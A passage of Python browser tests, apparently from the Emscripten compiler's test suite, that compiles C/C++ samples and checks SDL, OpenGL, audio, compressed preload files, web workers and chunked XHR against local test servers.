Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'subdirr', '-o', 'page.html']).communicate()
shutil.rmtree(os.path.join(self.get_dir(), 'subdirr'))
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_compressed_file(self):
open(os.path.join(self.get_dir(), 'datafile.txt'), 'w').write('compress this please' + (2000*'.'))
open(os.path.join(self.get_dir(), 'datafile2.txt'), 'w').write('moar' + (100*'!'))
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[21];
FILE *f = fopen("datafile.txt", "r");
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("file says: |%s|\n", buf);
int result = !strcmp("compress this please", buf);
FILE *f2 = fopen("datafile2.txt", "r");
fread(buf, 1, 5, f2);
buf[5] = 0;
fclose(f2);
result = result && !strcmp("moar!", buf);
printf("file 2 says: |%s|\n", buf);
REPORT_RESULT();
return 0;
}
'''))
self.build_native_lzma()
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '-o', 'page.html', '--preload-file', 'datafile.txt', '--preload-file', 'datafile2.txt',
'--compression', '%s,%s,%s' % (path_from_root('third_party', 'lzma.js', 'lzma-native'),
path_from_root('third_party', 'lzma.js', 'lzma-decoder.js'),
'LZMA.decompress')]).communicate()
assert os.path.exists(os.path.join(self.get_dir(), 'datafile.txt')), 'must be data file'
assert os.path.exists(os.path.join(self.get_dir(), 'page.data.compress')), 'must be data file in compressed form'
assert os.stat(os.path.join(self.get_dir(), 'page.js')).st_size != os.stat(os.path.join(self.get_dir(), 'page.js.compress')).st_size, 'compressed file must be different'
shutil.move(os.path.join(self.get_dir(), 'datafile.txt'), 'datafile.txt.renamedsoitcannotbefound')
self.run_browser('page.html', '', '/report_result?1')
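# The --compression argument used above is a comma-separated triple: the native
# compressor binary to run at build time, the JS decoder to ship alongside the
# page, and the JS function the runtime calls to decompress (here LZMA.decompress).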
def test_sdl_image(self):
# load an image file and get pixel data; also covers -O2 with --preload-file and memory-init files
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
open(os.path.join(self.get_dir(), 'sdl_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
for mem in [0, 1]:
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image.c'), '-O2', '--preload-file', 'screenshot.jpg', '-o', 'page.html', '--memory-init-file', str(mem)]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpeg'))
open(os.path.join(self.get_dir(), 'sdl_image_jpeg.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image_jpeg.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image_jpeg.c'), '--preload-file', 'screenshot.jpeg', '-o', 'page.html']).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_compressed(self):
for image, width in [(path_from_root('tests', 'screenshot2.png'), 300),
(path_from_root('tests', 'screenshot.jpg'), 600)]:
self.clear()
print image
basename = os.path.basename(image)
shutil.copyfile(image, os.path.join(self.get_dir(), basename))
open(os.path.join(self.get_dir(), 'sdl_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()).replace('screenshot.jpg', basename))
self.build_native_lzma()
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image.c'), '--preload-file', basename, '-o', 'page.html',
'--compression', '%s,%s,%s' % (path_from_root('third_party', 'lzma.js', 'lzma-native'),
path_from_root('third_party', 'lzma.js', 'lzma-decoder.js'),
'LZMA.decompress')]).communicate()
shutil.move(os.path.join(self.get_dir(), basename), basename + '.renamedsoitcannotbefound')
self.run_browser('page.html', '', '/report_result?' + str(width))
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not'])
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not'])
def test_sdl_canvas(self):
open(os.path.join(self.get_dir(), 'sdl_canvas.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_canvas.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_canvas.c'), '-o', 'page.html']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_key(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl_key.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_key.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_key.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''']).communicate()
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_text(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(charCode) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0, 0, charCode);
document.body.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl_text.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_text.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'sdl_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js']).communicate()
self.run_browser('page.html', '', '/report_result?740')
def test_sdl_mouse_offsets(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'page.html'), 'w').write('''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = 99999; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
open(os.path.join(self.get_dir(), 'sdl_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_mouse.c'), '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js']).communicate()
self.run_browser('page.html', '', '/report_result?600')
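# Unlike test_sdl_mouse, the simulated events above use raw page coordinates and
# the HTML places the canvas at a 5px container offset; the expected result
# relies on the SDL layer mapping page coordinates to canvas-relative ones itself.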
def test_sdl_audio(self):
shutil.copyfile(path_from_root('tests', 'sounds', 'alarmvictory_1.ogg'), os.path.join(self.get_dir(), 'sound.ogg'))
shutil.copyfile(path_from_root('tests', 'sounds', 'alarmcreatemiltaryfoot_1.wav'), os.path.join(self.get_dir(), 'sound2.wav'))
open(os.path.join(self.get_dir(), 'bad.ogg'), 'w').write('I claim to be audio, but am lying')
open(os.path.join(self.get_dir(), 'sdl_audio.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_audio.c')).read()))
# use closure to check for a possible bug with closure minifying away newer Audio() attributes
Popen([PYTHON, EMCC, '-O2', '--closure', '1', '--minify', '0', os.path.join(self.get_dir(), 'sdl_audio.c'), '--preload-file', 'sound.ogg', '--preload-file', 'sound2.wav', '--preload-file', 'bad.ogg', '-o', 'page.html', '-s', 'EXPORTED_FUNCTIONS=["_main", "_play", "_play2"]']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_audio_mix_channels(self):
shutil.copyfile(path_from_root('tests', 'sounds', 'noise.ogg'), os.path.join(self.get_dir(), 'sound.ogg'))
open(os.path.join(self.get_dir(), 'sdl_audio_mix_channels.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_audio_mix_channels.c')).read()))
Popen([PYTHON, EMCC, '-O2', '--minify', '0', os.path.join(self.get_dir(), 'sdl_audio_mix_channels.c'), '--preload-file', 'sound.ogg', '-o', 'page.html']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_audio_mix(self):
shutil.copyfile(path_from_root('tests', 'sounds', 'pluck.ogg'), os.path.join(self.get_dir(), 'sound.ogg'))
shutil.copyfile(path_from_root('tests', 'sounds', 'the_entertainer.ogg'), os.path.join(self.get_dir(), 'music.ogg'))
shutil.copyfile(path_from_root('tests', 'sounds', 'noise.ogg'), os.path.join(self.get_dir(), 'noise.ogg'))
open(os.path.join(self.get_dir(), 'sdl_audio_mix.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_audio_mix.c')).read()))
Popen([PYTHON, EMCC, '-O2', '--minify', '0', os.path.join(self.get_dir(), 'sdl_audio_mix.c'), '--preload-file', 'sound.ogg', '--preload-file', 'music.ogg', '--preload-file', 'noise.ogg', '-o', 'page.html']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_audio_quickload(self):
open(os.path.join(self.get_dir(), 'sdl_audio_quickload.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_audio_quickload.c')).read()))
Popen([PYTHON, EMCC, '-O2', '--minify', '0', os.path.join(self.get_dir(), 'sdl_audio_quickload.c'), '-o', 'page.html', '-s', 'EXPORTED_FUNCTIONS=["_main", "_play"]']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
open(os.path.join(self.get_dir(), 'sdl_gl_read.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_gl_read.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_gl_read.c'), '-o', 'something.html']).communicate()
self.run_browser('something.html', '.', '/report_result?1')
def test_sdl_ogl(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png'],
message='You should see an image with gray at the top.')
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png',
args=['--minify', '0', '--preload-file', 'screenshot.png'],
message='You should see an image with gray at the top.')
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png',
args=['--preload-file', 'screenshot.png'],
message='You should see an image with gray at the top.')
def test_sdl_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png'],
message='You should see an image with fog.')
def test_sdl_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png'],
message='You should see an image with fog.')
def test_sdl_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png'],
message='You should see an image with fog.')
def test_sdl_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png'],
message='You should see an image with fog.')
def test_sdl_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png',
args=['--preload-file', 'screenshot.png'],
message='You should see an image with fog.')
def test_openal_playback(self):
shutil.copyfile(path_from_root('tests', 'sounds', 'audio.wav'), os.path.join(self.get_dir(), 'audio.wav'))
open(os.path.join(self.get_dir(), 'openal_playback.cpp'), 'w').write(self.with_report_result(open(path_from_root('tests', 'openal_playback.cpp')).read()))
Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'openal_playback.cpp'), '--preload-file', 'audio.wav', '-o', 'page.html']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_glfw(self):
open(os.path.join(self.get_dir(), 'glfw.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'glfw.c')).read()))
Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'glfw.c'), '-o', 'page.html']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_egl_width_height(self):
open(os.path.join(self.get_dir(), 'test_egl_width_height.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_egl_width_height.c')).read()))
Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'test_egl_width_height.c'), '-o', 'page.html']).communicate()
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def test_freealut(self):
programs = self.get_library('freealut', os.path.join('examples', 'hello_world.bc'), make_args=['EXEEXT=.bc'])
for program in programs:
Popen([PYTHON, EMCC, '-O2', program, '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should hear "Hello World!"')
def test_worker(self):
# Test running in a web worker
output = Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'], stdout=PIPE, stderr=PIPE).communicate()
assert len(output[0]) == 0, output[0]
assert os.path.exists('worker.js'), output
self.assertContained('you should not see this text when in a worker!', run_js('worker.js')) # code should run standalone
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''')
html_file.close()
self.run_browser('main.html', 'You should see that the worker was called, and said "hello from worker!"', '/report_result?hello%20from%20worker!')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""")
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
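    # The pre-js below maps /bigfile to a lazy file served by the chunked server,
    # and forwards the worker's stdout/stderr to the embedding page via postMessage.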
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["stderr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. path_from_root('tests', 'hello_world_gles.c')
Popen([PYTHON, EMCC, path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_CHUNKS=1', '-o', worker_filename,
'--pre-js', prejs_filename]).communicate()
chunkSize = 1024
data = os.urandom(10*chunkSize+1) # 10 full chunks and one 1 byte chunk
expectedConns = 11
import zlib
checksum = zlib.adler32(data)
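    # Serve `data` over HTTP on port 11111. With byte-range support the client can
    # fetch it chunk by chunk; without it, every GET returns the whole payload.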
def chunked_server(support_byte_ranges):
class ChunkedServerHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:8888")
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
(start, end) = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data)-1, end)
length = end-start+1
s.sendheaders([],length)
s.wfile.write(data[start:end+1])
s.wfile.close()
httpd = BaseHTTPServer.HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns+1):
httpd.handle_request()
server = multiprocessing.Process(target=chunked_server, args=(True,))
server.start()
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
server.terminate()
def test_glgears(self):
self.btest('hello_world_gles.c', reference='gears.png',
args=['-DHAVE_BUILTIN_SINCOS'], outfile='something.html',
message='You should see animating gears.')
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
for emulation in [0, 1]:
if full_es2 and emulation: continue
print full_es2, emulation
Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING=1',
'--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
(['-s', 'FORCE_GL_EMULATION=1'] if emulation else []) +
(['-s', 'FULL_ES2=1'] if full_es2 else []),
).communicate()
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
assert ('var GLEmulation' in open(self.in_dir('something.html')).read()) == emulation, "emulation code should be added when asked for"
def test_fulles2_sdlproc(self):
self.btest('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING=1', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2=1'])
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png',
args=['-DHAVE_BUILTIN_SINCOS'], outfile='something.html',
message='You should see animating gears.')
with open('something.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
def test_glbook(self):
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.bc'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.bc'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.bc'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.bc'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.bc'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.bc'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.bc'),
], configure=None)
def book_path(*pathelems):
return path_from_root('tests', 'glbook', *pathelems)
for program in programs:
print program
basename = os.path.basename(program)
args = []
if basename == 'CH10_MultiTexture.bc':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), os.path.join(self.get_dir(), 'basemap.tga'))
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), os.path.join(self.get_dir(), 'lightmap.tga'))
args = ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.bc':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), os.path.join(self.get_dir(), 'smoke.tga'))
args = ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.bc', '.png')), args=args)
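  # Browser-test helper: compile `filename` with emcc plus `args` and load it.
  # Either checks /report_result against `expected`, or runs a pixel reftest
  # against `reference` (`reference_slack` accepts reported values 0..slack).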
def btest(self, filename, expected=None, reference=None, reference_slack=0,
args=[], outfile='test.html', message='.'): # TODO: use in all other tests
filepath = path_from_root('tests', filename)
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filename))
if not reference:
if '\n' in filename: # if we are provided the source and not a path, use that
src = filename
filename = 'main.cpp'
else:
with open(filepath) as f: src = f.read()
with open(temp_filepath, 'w') as f: f.write(self.with_report_result(src))
else:
expected = [str(i) for i in range(0, reference_slack+1)]
shutil.copyfile(filepath, temp_filepath)
self.reftest(path_from_root('tests', reference))
args = args + ['--pre-js', 'reftest.js', '-s', 'GL_TESTING=1']
Popen([PYTHON, EMCC, temp_filepath, '-o', outfile] + args).communicate()
if type(expected) is str: expected = [expected]
self.run_browser(outfile, message, ['/report_result?' + e for e in expected])
def test_gles2_emulation(self):
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), self.in_dir('basemap.tga'))
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), self.in_dir('lightmap.tga'))
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), self.in_dir('smoke.tga'))
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
#(os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
#(os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
]:
print source
self.btest(source,
reference=reference,
args=['-I' + path_from_root('tests', 'glbook', 'Common'),
path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
'-s', 'FULL_ES2=1',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'])
def test_emscripten_api(self):
self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']'''])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png')) # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1')
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1')
def test_sdl_resize(self):
self.btest('sdl_resize.c', '1')
def test_gc(self):
self.btest('browser_gc.cpp', '1')
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1')
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1'])
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png'])
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png'])
def test_gl_ps_strides(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png'])
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0'])
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0'])
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840'])
def test_cubegeom_pre(self):
self.btest('cubegeom_pre.c', expected=['-1472804742', '-1626058463', '-2046234971'])
def test_cubegeom_pre2(self):
self.btest('cubegeom_pre2.c', expected=['-1472804742', '-1626058463', '-2046234971'], args=['-s', 'GL_DEBUG=1']) # some coverage for GL_DEBUG not breaking the build
def test_cubegeom_pre3(self):
self.btest('cubegeom_pre3.c', expected=['-1472804742', '-1626058463', '-2046234971'])
def test_cubegeom(self):
